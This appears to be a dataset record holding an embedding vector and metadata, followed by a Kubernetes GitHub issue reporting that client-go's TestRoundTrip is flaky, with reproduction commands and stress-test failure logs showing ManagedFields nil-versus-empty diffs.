0.004064507316797972, -0.03541405498981476, 0.01099377777427435, 0.006746483966708183, -0.016803065314888954, 0.007630506064742804, -0.004280528053641319, -0.008587642572820187, -0.004111034795641899, -0.0018727309070527554, -0.013625903986394405, 0.012821643613278866, 0.0010543458629399538, 0.031186703592538834, -0.017507625743746758, 0.0034430332016199827, -0.01057503093034029, -0.0036723471712321043, -0.016404258087277412, 0.018531229346990585, 0.01665683649480343, 0.003004345577210188, 0.007118703797459602, 0.01414435263723135, -0.030415676534175873, 0.0003664038667920977, 0.008554409258067608, 0.005373923573642969, -0.007790029048919678, -0.008335065096616745, 0.002776693319901824, -0.0036723471712321043, 0.004626160487532616, 0.013200510293245316, 0.0016500637866556644, 0.012203492224216461, 0.005609884392470121, -0.0027733698952943087, 0.03209066390991211, 0.0008507881429977715, -0.022692115977406502, -0.0012828289764001966, 0.0020289302337914705, 0.019382016733288765, -0.011312823742628098, -0.03403152525424957, -0.005031614098697901, 0.004921942483633757, -0.00664345920085907, -0.0091858534142375, -0.013040986843407154, 0.008222069591283798, -0.010654792189598083, -0.024446865543723106, -0.037195395678281784, 0.029777584597468376, -0.0054204510524868965, 0.0018178949831053615, -0.015593351796269417, 0.01906297169625759, 0.01611180044710636, 0.010674732737243176, -0.03139939904212952, -0.006603578105568886, -0.0030807836446911097, -0.019315550103783607, 0.009032977744936943, 0.019461778923869133, 0.0008167233900167048, -0.022160371765494347, 0.015739580616354942, 0.0018461438594385982, -0.005995397921651602, 0.020631613209843636, 0.0008391562732867897, -0.018079247325658798, -0.019847292453050613, 0.011605282314121723, 0.0039049845654517412, -0.00011569555499590933, 0.01176480483263731, 0.006623518653213978, 0.011372644454240799, -0.010674732737243176, 0.0004337025457061827, -0.011299530044198036, -0.01076778769493103, -0.01819889061152935, -0.0034596503246575594, -0.012030676007270813, -0.01809254102408886, 0.01219684537500143, 0.00322867464274168, 0.022519297897815704, -0.0054204510524868965, 0.008501234464347363, -0.011804685927927494, -0.0027567530050873756, 0.0298041719943285, 0.005872432142496109, 0.012396248988807201, 0.010415508411824703, -0.008507881313562393, -0.017547504976391792, 0.014250701293349266, -0.01971435733139515, 0.0007303152233362198, 0.004862121306359768, -0.018026074394583702, -0.0003610033600125462, -0.03982752189040184, -0.0006929270457476377, 0.00010333669342799112, -0.0034795906394720078, 0.017321515828371048, 0.009059564210474491, -0.020219512283802032, 0.015221131965517998, 0.0078166164457798, -0.009318788535892963, -0.008594289422035217, -0.013865187764167786, -0.0016376010607928038, -0.023928416892886162, -0.009491605684161186, -0.01175815798342228, 0.006021984852850437, 0.01118653453886509, 0.011405878700315952, -0.03934895247220993, 0.0024028117768466473, -0.03201090544462204, 0.011093479581177235, 0.007397868670523167, -0.015686405822634697, -0.019661182537674904, 0.0015595012810081244, 0.035201359540224075, 0.005762760527431965, 0.013280271552503109, -0.023689132183790207, 0.01081431470811367, -0.02255917899310589, -0.0051545798778533936, 0.0024111203383654356, 0.020219512283802032, 0.00292790774255991, -0.00270191696472466, 0.011405878700315952, 0.014383637346327305, 0.007065529469400644, 0.007318107411265373, 0.0025407325010746717, 0.001528759952634573, 0.02067149244248867, -0.0030392413027584553, -0.0030060072895139456, -0.017414569854736328, 0.006852832622826099, -0.005546739790588617, -0.010515210218727589, -0.004609543364495039, -0.0018428204348310828, -0.013233743607997894, -0.020897483453154564, -0.00461619021371007, 0.0026836383622139692, 0.002251597587019205, 0.010475329123437405, -0.006530463695526123, 0.0041442690417170525, -0.0038052829913794994, -0.011372644454240799, -0.013087514787912369, -0.0007967830169945955, -0.016071919351816177, -0.012775115668773651, -0.007703620940446854, 0.0004976778291165829, -0.00962454080581665, -0.0017348101828247309, 0.01762726716697216, -0.011439112946391106, 0.001653387094847858, -0.021362759172916412, 0.01552688330411911, 0.022173665463924408, -0.0023795480374246836, -0.01762726716697216, -0.0298041719943285, 0.006789688020944595, 0.013253684155642986, -0.0403592623770237, 0.03086765669286251, -0.01827865093946457, -0.009597953408956528, 0.009092798456549644, -0.004961823113262653, -0.0053573064506053925, -0.017879845574498177, -0.01490208599716425, -0.011046952567994595, 0.020525263622403145, 0.004569662734866142, 0.002615508856251836, 0.004935235716402531, -0.021269703283905983, -0.016829652711749077, 0.003301789052784443, -0.0003850979555863887, -0.014131058938801289, 0.01999352127313614, 0.02456650696694851, -0.03171844407916069, 0.009079504758119583, 0.0012786748120561242, -0.01647072657942772, 0.01434375625103712, -0.006271239370107651, 0.002328035421669483, -0.0207645483314991, 0.013984830118715763, -0.011086832731962204, -0.007078823167830706, -0.004589603282511234, -0.011020365171134472, -0.002884703455492854, -0.02258576638996601, -0.0075108641758561134, -0.0025855982676148415, 0.011651809327304363, -0.017002468928694725, -0.000017720425603329204, 0.021495694294571877, 0.007504217326641083, -0.0018411587225273252, 0.026839707046747208, -0.004227353725582361, 0.005191137082874775, -0.009066211059689522, 0.019966933876276016, 0.017068937420845032, 0.010894075967371464, -0.007324754260480404, -0.023303618654608727, 0.0015636555617675185, -0.003758755512535572, -0.0023961651604622602, -0.010103109292685986, 0.0054104807786643505, -0.027783550322055817, -0.012057263404130936, -0.018650870770215988, -0.005918959621340036, -0.013798720203340054, 0.003391520818695426, -0.00193421368021518, 0.017201872542500496, -0.01877051405608654, 0.001149893389083445, 0.006467319093644619, 0.026268083602190018, 0.0072051119059324265, 0.007756795268505812, -0.014516572467982769, -0.006380910985171795, -0.008102428168058395, -0.002992713823914528, -0.005593267269432545, 0.010103109292685986, 0.007843202911317348, 0.020272687077522278, -0.01375883910804987, 0.016071919351816177, 0.017015762627124786, -0.02104371227324009, 0.013273624703288078, -0.004337025340646505, 0.01601874642074108, 0.01818559691309929, 0.014809031039476395, 0.011678396724164486, 0.020724667236208916, -0.0038318701554089785, -0.01504831574857235, -0.008700638078153133, 0.0027035786770284176, 0.005570003762841225, -0.011811332777142525, -0.023489728569984436, 0.008527821861207485, 0.0042306771501898766, 0.02648078091442585, 0.014848912134766579, -0.00006490998202934861, 0.008448060601949692, 0.00824201013892889, 0.016218148171901703, -0.026175029575824738, 0.002602215390652418, 0.010309159755706787, -0.0009579675388522446, -0.02475261688232422, -0.003974775783717632, -0.015247718431055546, 0.01846476085484028, 0.014277288690209389, -0.01667013019323349, 0.011704984121024609, -0.00704558938741684, -0.005918959621340036, 0.0016342776361852884, -0.008175542578101158, 0.012429483234882355, 0.02116335555911064, 0.011591988615691662, -0.013060927391052246, 0.0163909662514925, 0.018517935648560524, 0.009930293075740337, 0.023263737559318542, -0.018065955489873886, 0.0033300379291176796, -0.004373583011329174, 0.011452405713498592, -0.0026271408423781395, -0.006357647478580475, 0.004543075803667307, -0.0027002552524209023, -0.007417809218168259, -0.009717595763504505, 0.014835618436336517, -0.008767105638980865, 0.021947676315903664, 0.01510148961097002, 0.027570853009819984, -0.007869790308177471, -0.006161567289382219, -0.0022765230387449265, 0.0047823600471019745, 0.00785649660974741, 0.010840902104973793, 0.0075440979562699795, -0.009285555221140385, 0.000596964149735868, -0.007976138964295387, -0.0036391133908182383, -0.009916999377310276, 0.010176223702728748, 0.006573667749762535, -0.025975625962018967, -0.02237306907773018, 0.004885385278612375, 0.007058883085846901, 0.03275534510612488, 0.0012728588189929724, -0.010049935430288315, -0.016258029267191887, 0.004543075803667307, -0.004572986159473658, -0.023263737559318542, -0.002145248930901289, 0.00001295603306061821, 0.0016060287598520517, -0.0015113122062757611, -0.008109074085950851, 0.00685947947204113, 0.02189450152218342, 0.007484276778995991, -0.003462973516434431, 0.013559436425566673, -0.01310080848634243, 0.013732252642512321, -0.020046696066856384, 0.007869790308177471, -0.012123730964958668, -0.00270191696472466, 0.009518192149698734, -0.001544546103104949, -0.010887429118156433, 0.017972899600863457, 0.03573310375213623, -0.02592245116829872, 0.02325044572353363, -0.015978865325450897, 0.0020488707814365625, -0.015447122044861317, 0.005859138909727335, 0.022412950173020363, -0.005889049265533686, -0.0030076690018177032, -0.02468615025281906, 0.001604367047548294, 0.01018951740115881, -0.015327480621635914, 0.006773071363568306, 0.006171537563204765, 0.01366578508168459, 0.027863312512636185, -0.010349039919674397, 0.009697655215859413, 0.012130377814173698, -0.0013476351741701365, -0.010481975972652435, -0.0031954406294971704, -0.010335746221244335, 0.02477920427918434, -0.008587642572820187, -0.0020821045618504286, -0.0033350230660289526, 0.02532424032688141, 0.004277204629033804, 0.014955260790884495, -0.010076521895825863, -0.007490923628211021, 0.009544779546558857, -0.009066211059689522, 0.026653597131371498, 0.02017963118851185, 0.01705564372241497, -0.005646441597491503, -0.0036025559529662132, 0.006374264135956764, -0.0010310821235179901, 0.037195395678281784, 0.005207754205912352, -0.004749125801026821, -0.00265705119818449, -0.017560798674821854, 0.015978865325450897, 0.011033658869564533, -0.015619938261806965, -0.0013659137766808271, 0.01133941113948822, 0.004436727147549391, -0.004130975343286991, 0.01620485633611679, 0.007982785813510418, 0.00824201013892889, -0.039960455149412155, 0.004174179397523403, -0.014423517510294914, -0.023223858326673508, 0.00452645868062973, -0.0041143582202494144, -0.015952277928590775, -0.004074477590620518, 0.018797101452946663, 0.005191137082874775, 0.013087514787912369, -0.004543075803667307, -0.0069591812789440155, 0.0050382609479129314, 0.00784984976053238, -0.02266552858054638, 0.0045164888724684715, 0.0051645501516759396, -0.0005138793494552374, 0.02257247269153595, -0.008494587615132332, 0.020272687077522278, 0.00773685472086072, 0.027836725115776062, 0.001826203428208828, 0.004001363180577755, 0.00885351374745369, 0.0011648485669866204, -0.009518192149698734, 0.004091094713658094, -0.0021834680810570717, 0.01347302831709385, 0.009518192149698734, 0.01314733549952507, 0.011326117441058159, -0.00786314345896244, 0.021655216813087463, -0.015673112124204636, -0.0018295268528163433, -0.008906688541173935, -0.02209390513598919, 0.0008499572868458927, -0.004566339310258627, -0.008115720935165882, -0.012781762517988682, -0.025762928649783134, -0.00008344827801920474, -0.04107711464166641, -0.008301830850541592, 0.03836522623896599, 0.0003545643121469766, -0.006517169997096062, 0.0009745844872668386, 0.0024077969137579203, 0.013120748102664948, -0.012808349914848804, 0.009883765131235123, -0.0028165739495307207, 0.0156332328915596, 0.005536769516766071, -0.02477920427918434, -0.018517935648560524, 0.019873879849910736, -0.0032934807240962982, -0.0013451426057145, 0.002961141522973776, -0.0005246803630143404, 0.017321515828371048, -0.009072857908904552, 0.0014124412555247545, 0.03344660997390747, 0.0007066360558383167, -0.0312664657831192, -0.0013094161404296756, -0.012509244494140148, 0.0053772469982504845, -0.018717339262366295, -0.00045405831770040095, -0.003885044250637293, -0.014237407594919205, 0.00011299530160613358, 0.007823263294994831, 0.0038916910998523235, -0.0027052403893321753, 0.011073539033532143, -0.007404515519738197, 0.01677647791802883, 0.01656378246843815, -0.012236726470291615, 0.01347302831709385, -0.012402895838022232, -0.011864506639540195, -0.008487940765917301, 0.005722879432141781, 0.009784063324332237, 0.0060253082774579525, 0.012243373319506645, 0.001723178313113749, -0.003278525313362479, 0.0008607583004049957, -0.02410123310983181, -0.001117490348406136, 0.00800272636115551, -0.0019358753925189376, 0.0007145291310735047, 0.007331401109695435, 0.007790029048919678, -0.014450104907155037, 0.010156283155083656, -0.01725504733622074, 0.0017680440796539187, -0.006872773170471191, -0.002829867647960782, -0.014516572467982769, -0.007517511025071144, 0.008115720935165882, -0.026081973686814308, 0.005942223593592644, -0.013798720203340054, 0.007005708757787943, -0.010900722816586494, -0.01491537969559431, -0.013021046295762062, -0.012795056216418743, -0.0033632719423621893, 0.026254789903759956, 0.00866740383207798, 0.0321970134973526, 0.011286236345767975, -0.007304813712835312, -0.013878481462597847, -0.008933275938034058, 0.011086832731962204, -0.02116335555911064, -0.00045821256935596466, 0.009531485848128796, 0.01291469857096672, 0.00923902727663517, -0.010176223702728748, -0.008707284927368164, 0.004715892020612955, -0.019102852791547775, -0.014489986002445221, -0.015128077007830143, -0.006819598842412233, 0.0038086064159870148, 0.028634337708353996, 0.003198764054104686, 0.0072782267816364765, -0.0030026838649064302, -0.010707966051995754, -0.005151256453245878, -0.0025307624600827694, 0.0029943755362182856, 0.0005230187089182436, -0.02257247269153595, -0.019887173548340797, 0.013984830118715763, -0.014410223811864853, -0.008035959675908089, -0.014835618436336517, -0.011911033652722836, 0.03514818474650383, 0.011844566091895103, 0.0025307624600827694, -0.0065869614481925964, -0.01904967799782753, -0.012555771507322788, 0.011365997605025768, 0.0015304216649383307, 0.015606645494699478, 0.003914954606443644, 0.005928929895162582, 0.004456667695194483, 0.007065529469400644, 0.019209200516343117, 0.01991376094520092, 0.007371281739324331, 0.010249338112771511, -0.002008989918977022, -0.01014299038797617, -0.02362266555428505, 0.006709926761686802, 0.012216785922646523, 0.014410223811864853, 0.01190438773483038, -0.005543416365981102, -0.010754493996500969, 0.007703620940446854, 0.012688707560300827, -0.008109074085950851, -0.02067149244248867, -0.02999028190970421, 0.016922708600759506, -0.01914273388683796, 0.008580995723605156, -0.007351341191679239, 0.005347336642444134, -0.0033566250931471586, -0.011286236345767975, 0.014396931044757366, -0.011591988615691662, 0.002793310210108757, 0.00021664355881512165, 0.006899360101670027, 0.006440732162445784, 0.02485896646976471, -0.005799317732453346, -0.009744183160364628, -0.0075972722843289375, -0.009790710173547268, 0.006065188907086849, -0.003263570135459304, 0.017414569854736328, -0.011698337271809578, -0.004087771289050579, 0.008069193921983242, -0.01821218430995941, 0.006234681699424982, 0.021655216813087463, -0.003218704368919134, -0.001944183837622404, 0.007112056948244572, 0.0016342776361852884, 0.005018320865929127, 0.016404258087277412, 0.0012146994704380631, 0.012555771507322788, -0.012216785922646523, -0.025935744866728783, -0.021495694294571877, 0.01219684537500143, 0.008753812871873379, -0.006753130815923214, 0.03171844407916069, -0.003825223306193948, 0.01818559691309929, 0.008959862403571606, 0.007497570477426052, -0.011625222861766815, -0.015154663473367691, 0.006543757393956184, 0.0025407325010746717, 0.01238960213959217, 0.01434375625103712, -0.007889730855822563, -0.014755857177078724, 0.011930974200367928, 0.010668085888028145, 0.012083850800991058, 0.014038003981113434, 0.007178524974733591, -0.00867405068129301, -0.006676692981272936, 0.003878397634252906, 0.010608265176415443, 0.0200068149715662, -0.013971536420285702, -0.03451009467244148, -0.02382206730544567, 0.0035726455971598625, 0.0472453311085701, 0.009285555221140385, -0.014809031039476395, 0.007411162368953228, -0.006613548379391432, -0.03461644425988197, -0.011744864284992218, 0.022838344797492027, -0.010887429118156433, 0.006543757393956184, -0.009644481353461742, -0.002289816504344344, -0.000384890241548419, 0.0035028543788939714, -0.009305495768785477, -0.0012363014975562692, 0.007583978585898876, 0.01791972480714321, -0.007344694342464209, 0.006932593882083893, 0.02190779522061348, -0.028315292671322823, 0.008255303837358952, 0.005849168635904789, 0.0035061778035014868, 0.013971536420285702, 0.012927991338074207, -0.017746908590197563, -0.003148913150653243, -0.012070557102560997, -0.0075773317366838455, 0.02390182949602604, -0.012509244494140148, -0.017374688759446144, -0.005237664561718702, -0.018531229346990585, -0.02448674663901329, -0.002956156386062503, 0.005540092941373587, 0.009524838998913765, -0.01290140487253666, 0.0041475920006632805, 0.0047956532798707485, 0.015845928341150284, 0.000030274017262854613, 0.003516147844493389, 0.011286236345767975, 0.0025457176379859447, -0.03145257383584976, -0.017029056325554848, 0.00293953949585557, 0.005942223593592644, -0.013572730123996735, -0.00419079652056098, -0.01857111044228077, 0.006786365061998367, -0.011352703906595707, 0.0008665742352604866, -0.008780399337410927, 0.01600545272231102, 0.016710011288523674, -0.0010684703011065722, 0.007690327242016792, 0.027943072840571404, 0.013067574240267277, 0.0066833398304879665, 0.007790029048919678, 0.0020571791101247072, -0.014157646335661411, 0.010747847147285938, 0.009358669631183147, -0.015513590537011623, 0.007271579932421446, -0.014636214822530746, 0.005623178090900183, 0.017600679770112038, 0.00459292670711875, -0.006503876764327288, -0.011625222861766815, 0.02493872679769993, 0.012037322856485844, 0.009079504758119583, 0.012130377814173698, 0.016032038256525993, -0.00099950993899256, 0.0022117169573903084, 0.0037188746500760317, -0.002229995559900999, -0.01252253819257021, -0.003861780511215329, -0.003398167435079813, -0.0033366847783327103, -0.02953830175101757, 0.012608946301043034, 0.026706771925091743, -0.012183552607893944, -0.017268341034650803, 0.005324072670191526, 0.010083168745040894, -0.01781337708234787, -0.011658456176519394, 0.0021901146974414587, 0.016218148171901703, 0.027225220575928688, 0.003971452359110117, 0.033765655010938644, 0.028341880068182945, -0.015154663473367691, 0.017986193299293518, -0.01904967799782753, 0.011013718321919441, -0.014436811208724976, -0.010641498491168022, -0.00013283178850542754, 0.005533446557819843, -0.01764056086540222, -0.02095065824687481, -0.03347319737076759, 0.002575628226622939, -0.017494332045316696, 0.031106941401958466, 0.0054005105048418045, 0.013559436425566673, -0.004327055532485247, -0.0020870896987617016, -0.0022399656008929014, -0.0021834680810570717, 0.006297826301306486, -0.006174860987812281, 0.006872773170471191, -0.006470642518252134, -0.00799607951194048, 0.020432209596037865, 0.009724242612719536, 0.04618184268474579, 0.02448674663901329, 0.007909671403467655, 0.0045397523790597916, 0.009538132697343826, -0.019794117659330368, -0.016723304986953735, -0.015792755410075188, -0.006985768210142851, -0.009498251602053642, -0.0031638683285564184, -0.0017048997106030583, 0.010847548954188824, -0.011372644454240799, -0.009225733578205109, -0.004224030300974846, -0.007763441652059555, -0.004077801015228033, -0.01491537969559431, -0.011239709332585335, 0.000034999462513951585, 0.009405196644365788, 0.003974775783717632, -0.012821643613278866, 0.006317766848951578, 0.013413206674158573, -0.0019641241524368525, 0.00885351374745369, 0.007916318252682686, -0.000035752418625634164, 0.01772032119333744, -0.014968553557991982, 0.005044907797127962, -0.003175500314682722, 0.014450104907155037, 0.018132422119379044, -0.02077784202992916, 0.013998123817145824, -0.008155602030456066, -0.02247941866517067, 0.014077885076403618, 0.015167957171797752, -0.004011332988739014, 0.010216104798018932, 0.011552107520401478, 0.01838500052690506, 0.0010975499171763659, -0.008534468710422516, -0.0009604600491002202, 0.005064848344773054, 0.02773037552833557, 0.0010892414720728993, -0.011911033652722836, -0.023662544786930084, 0.002025607042014599, -0.03408470004796982, 0.003398167435079813, -0.0027517678681761026, -0.02677324041724205, -0.006500553339719772, -0.013134041801095009, -0.013233743607997894, 0.00636097090318799, 0.0063775875605642796, -0.022798463702201843, 0.009305495768785477, -0.008075840771198273, 0.015686405822634697, -0.025869276374578476, 0.007185171823948622, 0.003968128934502602, -0.0003223689564038068, 0.0075972722843289375, -0.012429483234882355, -0.02002010866999626, -0.000025963994630728848, 0.01608521305024624, -0.019754236564040184, -0.00648061279207468, 0.002342990832403302, -0.007776735350489616, -0.002351299161091447, -0.018690751865506172, -0.007836556062102318, -0.012515891343355179, -0.01857111044228077, 0.003645760240033269, 0.002776693319901824, -0.010029994882643223, 0.033021215349435806, -0.012309840880334377, 0.008574348874390125, -0.010355686768889427, -0.013253684155642986, 0.0003369087935425341, -0.01195091474801302, -0.0060053677298128605, 0.006028631702065468, -0.004436727147549391, 0.013865187764167786, -0.010840902104973793, 0.002959479810670018, -0.01433046255260706, -0.015646526589989662, -0.015566764399409294, -0.009365316480398178, -0.02839505486190319, -0.01753421127796173, -0.009551426395773888, -0.0033267145045101643, 0.001149893389083445, 0.006689986679702997, -0.004037920385599136, -0.006919300649315119, 0.014835618436336517, -0.0035726455971598625, -0.005127992480993271, -0.002522453898563981, 0.013639197684824467, 0.018544523045420647, -0.003030932741239667, -0.001957477303221822, 0.027304982766509056, -0.0004428418760653585, 0.0010078183840960264, 0.0005059863324277103, -0.004928589332848787, 0.007178524974733591, -0.003948188852518797, 0.007451042998582125, -0.006729867309331894, -0.0019641241524368525, -0.0030874304939061403, 0.02773037552833557, -0.009611247107386589, 0.018504641950130463, -0.003885044250637293, -0.000030455765227088705, 0.011685043573379517, 0.024247461929917336, 0.0031073708087205887, 0.0656702071428299, -0.002926246030256152, 0.0015919044381007552, -0.008414826355874538, -0.012801703065633774, -0.0024177671875804663, -0.0008798678172752261, 0.014197527430951595, -0.023848654702305794, 0.03201090544462204, -0.012456070631742477, 0.0023363439831882715, -0.02056514471769333, 0.000019434050045674667, 0.015792755410075188, -0.00245266268029809, 0.02382206730544567, -0.01714869774878025, 0.017933018505573273, 0.0033998291473835707, 0.00704558938741684, 0.0027484444435685873, 0.007650446612387896, 0.012741881422698498, -0.003004345577210188, -0.012210139073431492, -0.006706603337079287, 0.02047209069132805, -0.01782667078077793, -0.008155602030456066, -0.006567020900547504, 0.0018029396887868643, 0.00786314345896244, -0.0011806347174569964, 0.015978865325450897, 0.007284873630851507, 0.013998123817145824, 0.02342326194047928, 0.021309584379196167, 0.02172168530523777, -0.013353385962545872, -0.018358413130044937, 0.0036025559529662132, 0.010555090382695198, -0.003695610910654068, -0.02142922580242157, -0.0005255112191662192, 0.0042007663287222385, 0.006131656933575869, -0.011465699411928654, -0.011478993110358715, -0.0004872922436334193, -0.0028697482775896788, -0.031293053179979324, 0.003230336355045438, 0.0010842563351616263, 0.001630954211577773, 0.022040730342268944, 0.010275925509631634, -0.007796675898134708, -0.019966933876276016, 0.006424115039408207, 0.0014863867545500398 ]
null
null
null
null
null
null
null
null
null
[ "kubernetes", "kubernetes" ]
first spotted in publishing-bot run: https://github.com/kubernetes/kubernetes/issues/56876#issuecomment-2070999174 followed steps in [flaky-tests.md](https://github.com/kubernetes/community/blob/master/contributors/devel/sig-testing/flaky-tests.md) to recreate the problem. - `go test ./staging/src/k8s.io/client-go/scale -race -c` - `stress ./scale.test -test.run TestRoundTrip` left it running overnight and can see the issue: https://paste.mozilla.org/SQ7rRkd0/raw couple of examples from the stress run: ``` --- FAIL: TestRoundTrip (0.07s) roundtrip.go:135: starting group "" roundtrip.go:148: finished group "" roundtrip.go:135: starting group "apps" roundtrip.go:254: round tripping to apps/v1beta2, Kind=Scale v1beta2.Scale roundtrip.go:254: round tripping to apps/v1beta1, Kind=Scale v1beta1.Scale roundtrip.go:254: round tripping to apps/v1beta1, Kind=Scale v1beta1.Scale roundtrip.go:254: round tripping to apps/v1beta2, Kind=Scale v1beta2.Scale roundtrip.go:254: round tripping to apps/v1beta1, Kind=Scale v1beta1.Scale roundtrip.go:254: round tripping to apps/v1beta2, Kind=Scale v1beta2.Scale roundtrip.go:254: round tripping to apps/v1beta1, Kind=Scale v1beta1.Scale roundtrip.go:254: round tripping to apps/v1beta2, Kind=Scale v1beta2.Scale roundtrip.go:254: round tripping to apps/v1beta1, Kind=Scale v1beta1.Scale roundtrip.go:254: round tripping to apps/v1beta2, Kind=Scale v1beta2.Scale roundtrip.go:148: finished group "apps" roundtrip.go:135: starting group "autoscaling" roundtrip.go:254: round tripping to autoscaling/v1, Kind=Scale v1.Scale roundtrip.go:254: round tripping to autoscaling/v1, Kind=Scale v1.Scale roundtrip.go:254: round tripping to autoscaling/v1, Kind=Scale v1.Scale roundtrip.go:254: round tripping to autoscaling/v1, Kind=Scale v1.Scale roundtrip.go:254: round tripping to autoscaling/v1, Kind=Scale v1.Scale roundtrip.go:148: finished group "autoscaling" roundtrip.go:135: starting group "extensions" roundtrip.go:254: round tripping to extensions/v1beta1, Kind=Scale v1beta1.Scale roundtrip.go:360: Scale: diff: &scheme.Scale{ TypeMeta: {}, ObjectMeta: v1.ObjectMeta{ ... // 12 identical fields OwnerReferences: nil, Finalizers: nil, - ManagedFields: []v1.ManagedFieldsEntry{}, + ManagedFields: nil, }, Spec: {Replicas: 1622107388}, Status: scheme.ScaleStatus{ Replica … /var/folders/q1/kqwmr8293v7_1wrzjtyvzjs00000gr/T/go-stress-20240422T195237-1690711203 --- FAIL: TestRoundTrip (0.06s) roundtrip.go:135: starting group "" roundtrip.go:148: finished group "" roundtrip.go:135: starting group "apps" roundtrip.go:254: round tripping to apps/v1beta1, Kind=Scale v1beta1.Scale roundtrip.go:254: round tripping to apps/v1beta2, Kind=Scale v1beta2.Scale roundtrip.go:254: round tripping to apps/v1beta2, Kind=Scale v1beta2.Scale roundtrip.go:254: round tripping to apps/v1beta1, Kind=Scale v1beta1.Scale roundtrip.go:254: round tripping to apps/v1beta1, Kind=Scale v1beta1.Scale roundtrip.go:254: round tripping to apps/v1beta2, Kind=Scale v1beta2.Scale roundtrip.go:254: round tripping to apps/v1beta2, Kind=Scale v1beta2.Scale roundtrip.go:254: round tripping to apps/v1beta1, Kind=Scale v1beta1.Scale roundtrip.go:254: round tripping to apps/v1beta2, Kind=Scale v1beta2.Scale roundtrip.go:254: round tripping to apps/v1beta1, Kind=Scale v1beta1.Scale roundtrip.go:148: finished group "apps" roundtrip.go:135: starting group "autoscaling" roundtrip.go:254: round tripping to autoscaling/v1, Kind=Scale v1.Scale roundtrip.go:254: round tripping to autoscaling/v1, Kind=Scale v1.Scale roundtrip.go:254: round tripping to autoscaling/v1, Kind=Scale v1.Scale roundtrip.go:254: round tripping to autoscaling/v1, Kind=Scale v1.Scale roundtrip.go:254: round tripping to autoscaling/v1, Kind=Scale v1.Scale roundtrip.go:148: finished group "autoscaling" roundtrip.go:135: starting group "extensions" roundtrip.go:254: round tripping to extensions/v1beta1, Kind=Scale v1beta1.Scale roundtrip.go:360: Scale: diff: &scheme.Scale{ TypeMeta: {}, ObjectMeta: v1.ObjectMeta{ ... // 12 identical fields OwnerReferences: {{APIVersion: "Xȩ", Kind: `\FZ`, Name: "ʮʩȼŚ尺籴ŪZɨ蓻", UID: "}mǠʉjƱ/`Ï8Èŝ0", ...}}, Finalizers: {"ǒ賾赣"}, - ManagedFields: []v1.ManagedFieldsEntry{}, + ManagedFields: nil, … ```
TestRoundTrip is flaky
https://api.github.com/repos/kubernetes/kubernetes/issues/124475/comments
9
2024-04-23T12:15:02
2024-05-16T16:58:18Z
https://github.com/kubernetes/kubernetes/issues/124475
2,258,725,472
124,475
false
This is a GitHub Issue repo:kubernetes owner:kubernetes Title : TestRoundTrip is flaky Issue date: --- start body --- first spotted in publishing-bot run: https://github.com/kubernetes/kubernetes/issues/56876#issuecomment-2070999174 followed steps in [flaky-tests.md](https://github.com/kubernetes/community/blob/master/contributors/devel/sig-testing/flaky-tests.md) to recreate the problem. - `go test ./staging/src/k8s.io/client-go/scale -race -c` - `stress ./scale.test -test.run TestRoundTrip` left it running overnight and can see the issue: https://paste.mozilla.org/SQ7rRkd0/raw couple of examples from the stress run: ``` --- FAIL: TestRoundTrip (0.07s) roundtrip.go:135: starting group "" roundtrip.go:148: finished group "" roundtrip.go:135: starting group "apps" roundtrip.go:254: round tripping to apps/v1beta2, Kind=Scale v1beta2.Scale roundtrip.go:254: round tripping to apps/v1beta1, Kind=Scale v1beta1.Scale roundtrip.go:254: round tripping to apps/v1beta1, Kind=Scale v1beta1.Scale roundtrip.go:254: round tripping to apps/v1beta2, Kind=Scale v1beta2.Scale roundtrip.go:254: round tripping to apps/v1beta1, Kind=Scale v1beta1.Scale roundtrip.go:254: round tripping to apps/v1beta2, Kind=Scale v1beta2.Scale roundtrip.go:254: round tripping to apps/v1beta1, Kind=Scale v1beta1.Scale roundtrip.go:254: round tripping to apps/v1beta2, Kind=Scale v1beta2.Scale roundtrip.go:254: round tripping to apps/v1beta1, Kind=Scale v1beta1.Scale roundtrip.go:254: round tripping to apps/v1beta2, Kind=Scale v1beta2.Scale roundtrip.go:148: finished group "apps" roundtrip.go:135: starting group "autoscaling" roundtrip.go:254: round tripping to autoscaling/v1, Kind=Scale v1.Scale roundtrip.go:254: round tripping to autoscaling/v1, Kind=Scale v1.Scale roundtrip.go:254: round tripping to autoscaling/v1, Kind=Scale v1.Scale roundtrip.go:254: round tripping to autoscaling/v1, Kind=Scale v1.Scale roundtrip.go:254: round tripping to autoscaling/v1, Kind=Scale v1.Scale roundtrip.go:148: finished group "autoscaling" roundtrip.go:135: starting group "extensions" roundtrip.go:254: round tripping to extensions/v1beta1, Kind=Scale v1beta1.Scale roundtrip.go:360: Scale: diff: &scheme.Scale{ TypeMeta: {}, ObjectMeta: v1.ObjectMeta{ ... // 12 identical fields OwnerReferences: nil, Finalizers: nil, - ManagedFields: []v1.ManagedFieldsEntry{}, + ManagedFields: nil, }, Spec: {Replicas: 1622107388}, Status: scheme.ScaleStatus{ Replica … /var/folders/q1/kqwmr8293v7_1wrzjtyvzjs00000gr/T/go-stress-20240422T195237-1690711203 --- FAIL: TestRoundTrip (0.06s) roundtrip.go:135: starting group "" roundtrip.go:148: finished group "" roundtrip.go:135: starting group "apps" roundtrip.go:254: round tripping to apps/v1beta1, Kind=Scale v1beta1.Scale roundtrip.go:254: round tripping to apps/v1beta2, Kind=Scale v1beta2.Scale roundtrip.go:254: round tripping to apps/v1beta2, Kind=Scale v1beta2.Scale roundtrip.go:254: round tripping to apps/v1beta1, Kind=Scale v1beta1.Scale roundtrip.go:254: round tripping to apps/v1beta1, Kind=Scale v1beta1.Scale roundtrip.go:254: round tripping to apps/v1beta2, Kind=Scale v1beta2.Scale roundtrip.go:254: round tripping to apps/v1beta2, Kind=Scale v1beta2.Scale roundtrip.go:254: round tripping to apps/v1beta1, Kind=Scale v1beta1.Scale roundtrip.go:254: round tripping to apps/v1beta2, Kind=Scale v1beta2.Scale roundtrip.go:254: round tripping to apps/v1beta1, Kind=Scale v1beta1.Scale roundtrip.go:148: finished group "apps" roundtrip.go:135: starting group "autoscaling" roundtrip.go:254: round tripping to autoscaling/v1, Kind=Scale v1.Scale roundtrip.go:254: round tripping to autoscaling/v1, Kind=Scale v1.Scale roundtrip.go:254: round tripping to autoscaling/v1, Kind=Scale v1.Scale roundtrip.go:254: round tripping to autoscaling/v1, Kind=Scale v1.Scale roundtrip.go:254: round tripping to autoscaling/v1, Kind=Scale v1.Scale roundtrip.go:148: finished group "autoscaling" roundtrip.go:135: starting group "extensions" roundtrip.go:254: round tripping to extensions/v1beta1, Kind=Scale v1beta1.Scale roundtrip.go:360: Scale: diff: &scheme.Scale{ TypeMeta: {}, ObjectMeta: v1.ObjectMeta{ ... // 12 